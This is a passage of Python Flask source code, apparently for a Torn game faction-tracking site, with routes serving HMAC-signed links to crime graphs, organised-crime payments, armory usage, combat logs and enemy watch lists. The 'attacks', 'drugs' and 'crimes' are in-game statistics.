is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
f_id = faction_sum['fid']
p_id = int(current_user.username)
# what do we know about this player being a leader?
maybe_leader = Extra_leaders.query.filter_by(faction_id = int(faction_sum['fid'])).filter_by(player_id = int(current_user.username)).all()
leader_entry = False
et = 0
set_by = None
any_data = False
for ml in maybe_leader:
if ml.et > et:
any_data = True
et = ml.et
set_by = ml.set_by
leader_entry = True if ml.is_leader else False
if any_data:
leader_record = [any_data, leader_entry, time.strftime("%Y-%m-%d %H:%M",time.gmtime(et)), rodb.pid2n[str(set_by)]]
else:
leader_record = [any_data, False, 'never', '']
payment_due = []
if is_leader:
payment_due = rodb.oc_payment_check(faction_sum['fid'])
return render_template('home.html', title='home', u=current_user.username,
player=player, faction_sum=faction_sum, is_leader=is_leader,
leader_record=leader_record, payment_due=payment_due)
#=================================================================================
@app.route("/rhubarb/graph/<what_graph>", methods=['GET'])
@app.route("/graph/<what_graph>", methods=['GET'])
def jsgraph(what_graph):
p_id = None
graph_type = None
timestamp = None
given_hmac = None
df = None
right_now = int(time.time())
# what graph is this meant to produce?
re_object = token.match(what_graph)
if re_object:
p_id = re_object.group(1)
graph_type = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
else:
app.logger.info('in jsgraph RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
if 'crime' == graph_type:
graph_selection = ( str(p_id) + 'crime' + str(timestamp) ).encode("utf-8")
elif 'drug' == graph_type:
graph_selection = ( str(p_id) + 'drug' + str(timestamp) ).encode("utf-8")
else:
return render_template("bad_graph_request.html")
hmac_hex = hmac.new(hmac_key, graph_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
app.logger.info('in jsgraph HMAC disagreement')
return render_template("bad_graph_request.html")
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
app.logger.info('in jsgraph timestamp is old')
return render_template("bad_graph_request.html")
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
if 'crime' == graph_type:
parm = (int(p_id),)
df = pd.read_sql_query("select et,selling_illegal_products,theft,auto_theft,drug_deals,computer_crimes,murder,fraud_crimes,other,total from playercrimes where player_id=? order by et", conn, params=parm)
elif 'drug' == graph_type:
parm = (int(p_id),)
df = pd.read_sql_query("select et,cantaken,exttaken,lsdtaken,opitaken,shrtaken,pcptaken,xantaken,victaken,spetaken,kettaken from drugs where player_id=? order by et", conn, params=parm)
else:
conn.close()
return render_template("bad_graph_request.html")
conn.close()
# Does df contain reasonable data? TODO
# convert et to date-as-string so it can be parsed in JS
df['et'] = pd.to_datetime(df['et'],unit='s').astype(str)
chart_data = df.to_dict(orient='records')
data = {'chart_data': chart_data}
if 'crime' == graph_type:
return render_template("playercrimes.html", data=data)
elif 'drug' == graph_type:
return render_template("drug.html", data=data)
else:
return render_template("bad_graph_request.html")
#=================================================================================
@app.route("/rhubarb/faction_oc_history/<tid_cn_t>", methods=['GET','POST'])
@app.route("/faction_oc_history/<tid_cn_t>", methods=['GET','POST'])
@login_required
def faction_oc_history(tid_cn_t):
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
# fid, cn, history-or-et
percent_to_pay = 0
cu = current_user.username
logged_in = True
tid = None
cn = None
timestamp = None
history_column = None
hmac_given = None
re_object = oc_history_picker.match(tid_cn_t)
if re_object:
tid = re_object.group(1)
cn = re_object.group(2)
timestamp = re_object.group(3)
history_column = re_object.group(4)
hmac_given = re_object.group(5)
else:
return render_template('message.html', message='failed to discover the history intended by this click', logged_in=logged_in)
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
player = rodb.get_player_data(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
# check time and hmac
right_now = int(time.time())
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='link expired; cannot use it', logged_in=logged_in)
# either show all the data (up to the last year) or just a recent extract
long_search = False
if history_column == 'history':
long_search = True
flask_parm = (str(tid) + '-' + str(cn) + '-' + str(timestamp) + '-history' ).encode("utf-8")
else:
flask_parm = (str(tid) + '-' + str(cn) + '-' + str(timestamp)).encode("utf-8")
# read the payment policy of this faction (e.g. pay 20% of PA winnings to each player)
oc_percentages = rodb.get_oc_payment_policy(tid)
if int(cn) in oc_percentages:
percent_to_pay = oc_percentages[int(cn)][2]
hmac_hex_hist = hmac.new(hmac_key, flask_parm, digestmod=hashlib.sha1).hexdigest()
if not hmac_hex_hist == hmac_given:
return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
form = PaymentForm()
# - - - - - - - POST section
if request.method == 'POST':
if not is_leader:
return redirect('/rhubarb/logout')
if form.validate_on_submit():
try:
form_faction = request.form['faction_id']
ocp = request.form['oc_plan_id']
except:
app.logger.info('error involving paymentform')
return redirect('/rhubarb/faction_ov')
else:
app.logger.info('paymentform fails validation')
return redirect('/rhubarb/faction_ov')
# write to ORM payment for (form_faction,ocp) by current user at now
new_pay_id=int(random.random() * 1000000000)
pay = Payment_cache(id=new_pay_id, faction_id=int(tid), oc_plan_id=int(ocp), timestamp=int(time.time()), paid_by=int(cu))
db.session.add(pay)
db.session.commit()
return redirect('/rhubarb/faction_oc_history/' + tid_cn_t)
# - - - - - - - POST section
player = {'name':'no name'}
if int(cn):
try:
faction_sum = rodb.get_faction_for_player(current_user.username)
if not faction_sum['fid'] == int(tid):
# viewing from outside faction
return render_template('message.html', message='organised crime data - need to be logged in and in the faction to see that', logged_in=logged_in)
except:
# viewing from outside faction
return render_template('message.html', message='organised crime data - need to be logged in and in the faction to see that', logged_in=logged_in)
else:
# This is a player request and not a faction request - indicated by crime number 0.
# no need to authenticate the user but we do want the name
player = rodb.get_player_data(tid)
# This is the file with Payment_cache defined. Read ORM here and pass details to rodb.get_oc()
payment_query = db.session.query(Payment_cache).filter(Payment_cache.faction_id == tid)
want_payment = payment_query.all()
cached_payments = {}
for cached in want_payment:
cached_payments[cached.oc_plan_id] = {'paid_at':cached.timestamp, 'paid_by':cached.paid_by}
try:
octable, future = rodb.get_oc(tid, cn, long_search, cached_payments) # "tid" might be fid or pid
except:
# example data
octable = [[ 'Today', 8, 'failed to fetch octable', {'4':'Duke', '317178':'Flex'} , {'money':100, 'respect':5, 'delay':1800}, {'paid_by':0, 'paid_at':0}, 1234 ],
[ 'Yesterday', 8, 'failed to fetch octable', {'1455847':'Para'} , {'result':'FAIL', 'delay':60}, {'paid_by':0, 'paid_at':0}, 2345 ]]
return render_template("completed_oc.html", form=form, cn=int(cn), player_name=player['name'], cu=cu, octable=octable, make_links=True if int(tid) >0 else False, percent_to_pay=percent_to_pay)
#=================================================================================
@app.route("/armory_index", methods=['GET'])
@login_required
def armory_index():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
player = rodb.get_player_data(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
if not is_leader:
return render_template('message.html', title='Denied', u=current_user.username, player=player, message='No access to armorynews!', logged_in=True)
f_id = faction_sum['fid']
players = {}
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
c.execute("select player_id,neumune,empty_blood,morphine,full_blood,first_aid,small_first_aid,bottle_beer,xanax,energy_refill from factionconsumption where faction_id=?", (f_id,))
for row in c:
p = row[0]
# Not as nice as Perl - am I missing a Python trick here?
if not p in players:
players[p] = {}
players[p]['neumune'] = row[1]
players[p]['empty_blood'] = row[2]
players[p]['morphine'] = row[3]
players[p]['full_blood'] = row[4]
players[p]['first_aid'] = row[5]
players[p]['small_first_aid'] = row[6]
players[p]['bottle_beer'] = row[7]
players[p]['xanax'] = row[8]
players[p]['energy_refill'] = row[9]
else:
players[p]['neumune'] += row[1]
players[p]['empty_blood'] += row[2]
players[p]['morphine'] += row[3]
players[p]['full_blood'] += row[4]
players[p]['first_aid'] += row[5]
players[p]['small_first_aid'] += row[6]
players[p]['bottle_beer'] += row[7]
players[p]['xanax'] += row[8]
players[p]['energy_refill'] += row[9]
c.close()
conn.close()
right_now = int(time.time())
for p in players.keys():
players[p]['name'] = rodb.pid2namepid(p)
display_selection = (str(p) + '-' + str(right_now) ).encode("utf-8")
players[p]['url'] = '/rhubarb/armorynews/' + str(p) + '-' + str(right_now) + '-' + hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
return render_template("faction_stuff_used.html", players=players)
#=================================================================================
@app.route("/rhubarb/armorynews/<player_t>", methods=['GET'])
@app.route("/armorynews/<player_t>", methods=['GET'])
@login_required
def armorynews(player_t):
p_id = None
timestamp = None
given_hmac = None
right_now = int(time.time())
re_object = armory_token.match(player_t)
if re_object:
p_id = re_object.group(1)
timestamp = re_object.group(2)
given_hmac = re_object.group(3)
else:
app.logger.info('in armorynews RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(p_id) + '-' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=True)
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=True)
# need to know faction of the player viewing this page
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = faction_sum['fid']
player = rodb.get_player_data(p_id)
stuff_used = []
parm = (int(p_id), int(f_id),)
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
c.execute("select et,words from factionconsumption where player_id=? and faction_id=? order by et desc", parm)
for row in c:
printable_time = time.strftime("%Y-%m-%d %H:%M",time.gmtime(row[0]))
stuff_used.append([printable_time, row[1]])
c.close()
conn.close()
return render_template("stuff_used.html", player_name=player['name'], stuff_used=stuff_used)
#=================================================================================
@app.route("/chain_bonus/<faction_player_t>", methods=['GET'])
@app.route("/rhubarb/chain_bonus/<faction_player_t>", methods=['GET'])
def chain_bonus(faction_player_t):
f_id = None
p_id = None
timestamp = None
given_hmac = None
right_now = int(time.time())
logged_in = False
try:
u = current_user.username
logged_in = True
except:
pass
re_object = bonus_token.match(faction_player_t)
if re_object:
f_id = re_object.group(1)
p_id = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
else:
app.logger.info('in chain_bonus RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(f_id) + '-' + str(p_id) + 'bonus' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=logged_in)
# Need to show details of the player we are enquring about, which might not be the current player viewing it.
tbefore = int(time.time()) - 3600 # an hour ago
parm = (int(f_id), int(p_id), tbefore,)
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
bonus_list = []
c.execute("select et,att_name,att_id,verb,def_name,def_id,respect from long_term_bonus where fid=? and att_id=? and et<? order by et desc", parm)
for row in c:
record = list(row)
record[0] = (time.strftime("%Y-%m-%d", time.gmtime(record[0])))
bonus_list.append(record)
c.execute("select name from namelevel where player_id=?", (int(p_id),))
name = '?'
for row in c:
name = row[0]
c.close()
conn.close()
rodb = read_sqlite.Rodb()
faction_name = rodb.get_faction_name(f_id)
return render_template("chain_bonus.html", faction_id=f_id, faction_name=faction_name, player={'name':name, 'pid':p_id, 'chain_bonus_list':bonus_list})
#=================================================================================
@app.route("/defend_summary/<faction_player_role_t>", methods=['GET'])
@app.route("/rhubarb/defend_summary/<faction_player_role_t>", methods=['GET'])
def defend_summary(faction_player_role_t):
f_id = None
p_id = None
role = None
timestamp = None
given_hmac = None
df = None
right_now = int(time.time())
logged_in = False
try:
u = current_user.username
logged_in = True
except:
pass
# what page is this meant to produce, attack or defend?
re_object = combat_token.match(faction_player_role_t)
if re_object:
f_id = re_object.group(1)
p_id = re_object.group(2)
role = re_object.group(3)
timestamp = re_object.group(4)
given_hmac = re_object.group(5)
else:
app.logger.info('in defend_summary RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(f_id) + '-' + str(p_id) + role + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
# test for acceptable timestamp
if ((int(timestamp) + (86400 * 7)) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=logged_in)
# no time limit on defends other than the 28 days of storage
parm = (int(f_id), int(p_id),)
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
if 'defsum' == role: # only allowed role
c.execute("select count(att_id) as num,att_name,att_id,def_name,def_id from combat_events where fid=? and def_id=? and outcome like '%lost' group by att_id order by att_id", parm)
else:
c.close()
conn.close()
return render_template("bad_graph_request.html")
defend_lines = []
safe_text = dehtml.Dehtml()
for row in c:
defend_lines.append(row)
c.close()
conn.close()
return render_template("defend_summary.html", dl=defend_lines)
#=================================================================================
@app.route("/faction_attack/<faction_player_role_t>", methods=['GET'])
@app.route("/rhubarb/faction_attack/<faction_player_role_t>", methods=['GET'])
def combat_events(faction_player_role_t):
f_id = None
p_id = None
role = None
timestamp = None
given_hmac = None
df = None
right_now = int(time.time())
logged_in = False
try:
u = current_user.username
logged_in = True
except:
pass
# what page is this meant to produce, attack or defend?
re_object = combat_token.match(faction_player_role_t)
if re_object:
f_id = re_object.group(1)
p_id = re_object.group(2)
role = re_object.group(3)
timestamp = re_object.group(4)
given_hmac = re_object.group(5)
else:
app.logger.info('in combat_events RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(f_id) + '-' + str(p_id) + role + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=logged_in)
tbefore = int(time.time()) - 3600 # an hour ago
parm = (int(f_id), int(p_id), tbefore,)
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
if 'attack' == role:
c.execute("select et,att_name,att_id,verb,def_name,def_id,outcome from combat_events where fid=? and att_id=? and et<? order by et desc", parm)
elif 'defend' == role:
c.execute("select et,att_name,att_id,verb,def_name,def_id,outcome from combat_events where fid=? and def_id=? and et<? order by et desc", parm)
else:
c.close()
conn.close()
return render_template("bad_graph_request.html")
att_count = 0
items = []
old_et = 0
old_att_id = 0
old_def_id = 0
safe_text = dehtml.Dehtml()
for i in c:
et = i[0]
if (old_et == et) and (old_att_id == i[2]) and (old_def_id == i[5]):
continue
iso_time = datetime.datetime.utcfromtimestamp(et).isoformat()
items.append( { 'et': iso_time, 'att_name': safe_text.html_clean(i[1]), 'att_id': i[2], 'verb': i[3], 'def_name': safe_text.html_clean(i[4]), 'def_id': i[5], 'outcome': safe_text.html_clean(i[6])} )
att_count += 1
old_et = et
old_att_id = i[2]
old_def_id = i[5]
if 'attack' == role:
player_name = i[1]
else:
player_name = i[4]
c.close()
conn.close()
if att_count:
return render_template("combat_events.html", data=items, role=role, player_name=player_name)
return render_template("combat_none.html", role=role, player_id=p_id)
#=================================================================================
@app.route("/rhubarb/enemy_watch", methods=['GET','POST'])
@app.route("/enemy_watch", methods=['GET','POST'])
@login_required
def enemy_watch():
form = EnemyForm()
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = int(faction_sum['fid'])
# if form.validate_on_submit():
if request.method == 'POST':
try:
enemy = request.form['enemy']
time_id = request.form['timerange_id']
except:
app.logger.info('error reading from enemy form')
return render_template('message.html', message='something wrong with enemy selection', logged_in=True)
# get enemy and time details from ORM
wantenemy = Enemy.query.filter_by(id = enemy).first()
if not wantenemy:
# unknown enemy id in postgres
return render_template('message.html', message='enemy selection not recognised', logged_in=True)
if not wantenemy.f_id == f_id:
return render_template('message.html', message='enemy selection looks invalid for this faction', logged_in=True)
wanttime = Timerange.query.filter_by(id = time_id).first()
if not wanttime:
# unknown time id in postgres
return render_template('message.html', message='timerange selection not recognised', logged_in=True)
if not wanttime.f_id == f_id:
return render_template('message.html', message='timerange selection looks invalid for this faction', logged_in=True)
# link to next page (with HMAC)
selector = str(wantenemy.tornid) + '-' + str(wanttime.id) + '-' + str(int(time.time()))
hmac_hex = hmac.new(hmac_key, selector.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
return redirect('/rhubarb/enemy_log/' + selector + '-' + hmac_hex)
# show form before submission
form.enemy.choices = [(e.id, e.username + '[' + e.tornid + ']') for e in Enemy.query.filter_by(f_id = f_id).all()]
form.timerange_id.choices = [(t.id, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tstart)) + ' to ' + time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tend))) for t in Timerange.query.filter_by(f_id = f_id).all()]
return render_template('enemy_watch.html', title='Enemy Watch', form=form, now=int(time.time()))
#=================================================================================
@app.route("/rhubarb/enemy_watch_faction", methods=['GET','POST'])
@app.route("/enemy_watch_faction", methods=['GET','POST'])
@login_required
def enemy_watch_faction():
form = EnemyForm()
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = int(faction_sum['fid'])
# if form.validate_on_submit():
if request.method == 'POST':
try:
enemy = request.form['enemy']
time_id = request.form['timerange_id']
except:
app.logger.info('error reading from enemy form')
return render_template('message.html', message='something wrong with enemy selection', logged_in=True)
wanttime = Timerange.query.filter_by(id = time_id).first()
if not wanttime:
# unknown time id in postgres
return render_template('message.html', message='timerange selection not recognised', logged_in=True)
if not wanttime.f_id == f_id:
return render_template('message.html', message='timerange selection looks invalid for this faction', logged_in=True)
# get details of taget faction
enemy_factions = {} # count of attacks by us on other factions
all_enemy_faction_attacks = rodb.get_targeted_chain(f_id, enemy, wanttime.tstart, wanttime.tend) # specific faction, specific time
player_items = []
total = 0
for apid in all_enemy_faction_attacks:
# XXX not needed ? # link to next pages (with HMAC)
# selector = str(apid) + '-' + str(enemy) + '-' + str(wanttime.id) + '-' + str(int(time.time()))
# hmac_hex = hmac.new(hmac_key, selector.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
player_items.append( [all_enemy_faction_attacks[apid][2], all_enemy_faction_attacks[apid][1], all_enemy_faction_attacks[apid][0]] )
total += all_enemy_faction_attacks[apid][2]
return render_template('enemy_watch_faction2.html', player_items=player_items, enemy_faction_name=rodb.get_faction_name(enemy), total=total)
# show form before submission
enemy_factions = {} # count of attacks by us on other factions
all_enemy_faction_attacks = rodb.get_targeted_chain(f_id, None, 0, 2100000000) # not specific to faction, all time
for x in all_enemy_faction_attacks.keys():
# only bother with worthwhile numbers
if x:
if all_enemy_faction_attacks[x] >= 50:
enemy_factions[x] = all_enemy_faction_attacks[x]
sorted_ef = sorted(enemy_factions.items(), key=lambda kv: kv[1], reverse=True)
enemy_factions_counted = list(sorted_ef)
form.enemy.choices = [(ek[0], rodb.get_faction_name(ek[0]) + '[' + str(ek[0]) + ']') for ek in enemy_factions_counted]
form.timerange_id.choices = [(t.id, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tstart)) + ' to ' + time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tend))) for t in Timerange.query.filter_by(f_id = f_id).all()]
return render_template('enemy_watch_faction.html', title='Enemy Watch Faction', form=form, enemy_factions_counted=enemy_factions_counted, now=int(time.time()))
#=================================================================================
@app.route("/enemy_log/<player_t_t_hmac>", methods=['GET'])
@app.route("/rhubarb/enemy_log/<player_t_t_hmac>", methods=['GET'])
@login_required
def enemy_log(player_t_t_hmac):
# display summary for that enemy and time range
# with links to times and outcomes
p_id = None
time_id = None
timestamp = None
given_hmac = None
right_now = int(time.time())
re_object = enemy_token.match(player_t_t_hmac)
if re_object:
p_id = re_object.group(1)
time_id = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
else:
app.logger.info('in enemy_log RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(p_id) + '-' + str(time_id) + '-' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=True)
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=True)
# need to know faction of the player viewing this page
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = faction_sum['fid']
enemy = Enemy.query.filter_by(tornid = p_id).first()
if not enemy:
return render_template('message.html', message='enemy not recognised in enemy_log', logged_in=True)
wanttime = Timerange.query.filter_by(id = time_id).first()
if not wanttime:
# unknown time id in postgres
return render_template('message.html', message='timerange not recognised in enemy_log', logged_in=True)
if not wanttime.f_id == f_id:
return render_template('message.html', message='timerange selection looks invalid for this faction in enemy_log', logged_in=True)
tstart = wanttime.tstart
tend = wanttime.tend
if tend > right_now - 3600:
tend = right_now - 3600 # do not display events within the last hour
attacks = rodb.get_attacks_on_target(faction_sum['fid'], p_id, tstart, tend)
deco_attacks = []
for d in attacks:
name = str(d[1]) + '[' + str(d[2]) + ']'
display_selection = str(p_id) + '-' + str(d[2])+ '-' + str(tstart) + '-' + str(tend)
hmac_hex = hmac.new(hmac_key, display_selection.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
link = '/rhubarb/target_log/' + display_selection + '-' + hmac_hex
deco_attacks.append([d[0], name, link])
return render_template("enemy_log.html", faction_sum=faction_sum, attacks=deco_attacks, target=str(enemy.username) + '[' + str(p_id) + ']')
#=================================================================================
@app.route("/target_log/<defid_attid_tstart_tend_hmac>", methods=['GET'])
@app.route("/rhubarb/target_log/<defid_attid_tstart_tend_hmac>", methods=['GET'])
def target_log(defid_attid_tstart_tend_hmac):
# defails of attacks on a specific target by a specific player
defid = None
attid = None
tstart = None
tend = None
given_hmac = None
right_now = int(time.time())
re_object = target_token.match(defid_attid_tstart_tend_hmac)
if re_object:
defid = re_object.group(1)
attid = re_object.group(2)
tstart = re_object.group(3)
tend = re_object.group(4)
given_hmac = re_object.group(5)
else:
app.logger.info('in target_log RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = str(defid) + '-' + str(attid)+ '-' + str(tstart) + '-' + str(tend)
hmac_hex = hmac.new(hmac_key, display_selection.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=True)
# from here it's similar to combat_events and uses the same template
role='attack'
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
c.execute("select et,att_name,att_id,verb,def_name,def_id,outcome from combat_events where def_id = ? and att_id=? and et>? and et<? order by et desc", (defid,attid,tstart,tend,))
items = []
old_et = 0
old_att_id = 0
old_def_id = 0
safe_text = dehtml.Dehtml()
for i in c:
et = i[0]
if (old_et == et) and (old_att_id == i[2]) and (old_def_id == i[5]):
continue
iso_time = datetime.datetime.utcfromtimestamp(et).isoformat()
items.append( { 'et': iso_time, 'att_name': safe_text.html_clean(i[1]), 'att_id': i[2], 'verb': i[3], 'def_name': safe_text.html_clean(i[4]), 'def_id': i[5], 'outcome': safe_text.html_clean(i[6])} )
old_et = et
old_att_id = i[2]
old_def_id = i[5]
player_name = i[1]
c.close()
conn.close()
return render_template("combat_events.html", data=items, role=role, player_name=player_name)
#=================================================================================
@app.route("/delete_faction_enemies/", methods=['GET','POST'])
@app.route("/rhubarb/delete_faction_enemies/", methods=['GET','POST'])
@login_required
def delete_faction_enemies():
form = DeleteEnemyForm()
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = int(faction_sum['fid'])
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
if not is_leader:
return redirect('/rhubarb/home')
# read enemies from ORM - BEFORE the POST section otherwise form choices won't be ready
baddies = {}
want_enemy = Enemy.query.filter_by(f_id = faction_sum['fid']).all()
for enemy in want_enemy:
baddies[enemy.tornid] = enemy.username
form.de_id.choices = [( int(k), baddies[k] + '[' + k + ']') for k in sorted(baddies.keys())]
# - - - - - - - POST section
if request.method == 'POST':
if form.validate_on_submit():
try:
de_id = request.form['de_id']
except:
app.logger.info('error involving DeleteEnemyForm')
return render_template('message.html', title='delete enemy', message='DeleteEnemyForm exception reading input', logged_in=True)
else:
app.logger.info('DeleteEnemyForm fails validation')
return render_template('message.html', title='delete enemy', message='DeleteEnemyForm failed validation: ' + str(request.form), form=form , logged_in=True)
if de_id:
wantenemy = Enemy.query.filter_by(tornid = de_id).filter_by(f_id = faction_sum['fid']).first()
if wantenemy:
db.session.delete(wantenemy)
db.session.commit()
return redirect('/rhubarb/enemy_watch')
# - - - - - - - POST section
faction_name = rodb.get_faction_name(f_id)
return render_template('delete_faction_enemies.html', title='Enemies', form=form, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/add_faction_enemies/", methods=['GET','POST'])
@app.route("/rhubarb/add_faction_enemies/", methods=['GET','POST'])
@login_required
def add_faction_enemies():
form = AddEnemyForm()
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = int(faction_sum['fid'])
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
if not is_leader:
return redirect('/rhubarb/home')
# - - - - - - - POST section
if request.method == 'POST':
if form.validate_on_submit():
try:
add_id = request.form['add_id']
except:
app.logger.info('error involving AddEnemyForm')
return render_template('message.html', title='add enemy', message='AddEnemyForm exception reading input', logged_in=True)
else:
app.logger.info('AddEnemyForm fails validation')
return render_template('message.html', title='add enemy', message='AddEnemyForm failed validation: ' + str(request.form), form=form , logged_in=True)
# XXX form validation could do better
try:
actual_integer = int(add_id)
except ValueError:
return render_template('message.html', title='add enemy', message='AddEnemyForm accepts only an integer', form=form , logged_in=True)
if add_id:
# XXX does not obtain username (fix up in another program) or check whether already in table
new_enemy = Enemy (tornid = add_id, f_id = faction_sum['fid'], username = '?')
db.session.add(new_enemy)
db.session.commit()
return redirect('/rhubarb/enemy_watch')
# - - - - - - - POST section
faction_name = rodb.get_faction_name(f_id)
return render_template('add_faction_enemies.html', title='Enemies', form=form, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/define_timerange/<t_to_t>", methods=['GET','POST'])
@app.route("/rhubarb/define_timerange/<t_to_t>", methods=['GET','POST'])
@login_required
def define_timerange(t_to_t):
form = TimeForm()
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = int(faction_sum['fid'])
# sane defaults
tstart = int(time.time())
tend = tstart + 86400
# what is t_to_t telling us?
re_object = time_interval.match(t_to_t)
if re_object:
tstart = int(re_object.group(1))
tend = int(re_object.group(2))
if tstart > tend:
tstart, tend = tend, tstart
# - - - - - - - POST section
if request.method == 'POST':
new_tr = Timerange (tstart=tstart, tend=tend, f_id=f_id)
db.session.add(new_tr)
db.session.commit()
#return render_template('message.html', title='TBC', message='plan to creat this timerange {} to {}'.format(tstart,tend), logged_in=True)
return redirect('/rhubarb/enemy_watch')
# - - - - - - - POST section
# variations: plus one day etc
start_block = []
start_block.append( [ 'planned time', tstart, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart)) ] )
start_block.append( [ 'plus 1 day', tstart+86400, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart+86400)) ] )
start_block.append( [ 'minus 1 day', tstart-86400, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart-86400)) ] )
start_block.append( [ 'plus 1 hour', tstart+3600, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart+3600)) ] )
start_block.append( [ 'minus 1 hour', tstart-3600, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart-3600)) ] )
start_block.append( [ 'plus 1 minute', tstart+60, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart+60)) ] )
start_block.append( [ 'minus 1 minute', tstart-60, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tstart-60)) ] )
end_block = []
end_block.append( [ 'planned time', tend, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend)) ] )
end_block.append( [ 'plus 1 day', tend+86400, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend+86400)) ] )
end_block.append( [ 'minus 1 day', tend-86400, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend-86400)) ] )
end_block.append( [ 'plus 1 hour', tend+3600, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend+3600)) ] )
end_block.append( [ 'minus 1 hour', tend-3600, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend-3600)) ] )
end_block.append( [ 'plus 1 minute', tend+60, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend+60)) ] )
